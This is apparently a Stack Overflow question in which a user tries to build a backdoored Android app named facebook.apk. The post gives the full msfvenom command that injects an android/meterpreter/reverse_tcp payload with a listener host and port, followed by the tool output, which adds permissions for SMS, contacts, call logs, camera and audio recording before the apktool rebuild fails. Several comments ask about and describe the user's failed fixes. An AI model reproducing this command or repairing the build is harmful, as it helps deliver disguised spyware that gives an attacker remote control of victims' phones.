# Whenever I tried to attach a payload with the Facebook app it shows this error. I am using Linux Debian on a virtual machine

Tags: facebook, payload

Can someone solve it?

I am running it in virtual box and I have properly installed APK tool and have tried several codes but none of them works.

```
sudo msfvenom -x payload.apk -p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -o /users/shayan/desktop/facebook.apk
Using APK template: payload.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.requapp.requ.rkbgo
[*] Loading /tmp/d20200917-5683-14dm83h/original/smali/com/requapp/requ/AttaPollApp.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20200917-5683-14dm83h/output.apk
[-] I: Using Apktool 2.4.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: /tmp/d20200917-5683-14dm83h/original/AndroidManifest.xml:1: error: No resource identifier found for attribute 'compileSdkVersion' in package 'android'
W:
W: /tmp/d20200917-5683-14dm83h/original/AndroidManifest.xml:1: error: No resource identifier found for attribute 'compileSdkVersionCodename' in package 'android'
W:
W: /tmp/d20200917-5683-14dm83h/original/AndroidManifest.xml:14: error: No resource identifier found for attribute 'appComponentFactory' in package 'android'
W:
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_11686599309256190546.tmp, p, --forced-package-id, 127, --min-sdk-version, 23, --target-sdk-version, 28, --version-code, 102, --version-name, 3.2.2, --no-version-vectors, -F, /tmp/APKTOOL9668598396774158541.tmp, -e, /tmp/APKTOOL5534393552967541314.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20200917-5683-14dm83h/original/res, -M, /tmp/d20200917-5683-14dm83h/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool
```

I am running it in virtual box and I have properly installed apk tool and have tried several codes but none of them works

Comment: Welcome to Stack Overflow! Can you elaborate on “have tried several codes but none of them works?”

Comment: Like installing android sdk,libraries,zipalign apktool latest version 2.4.1

Comment: As I am new to stackoverflow I dont know how to ask questions so I have written that thing to post my question

Comment: Instead of tcp i used https http and same problem occurs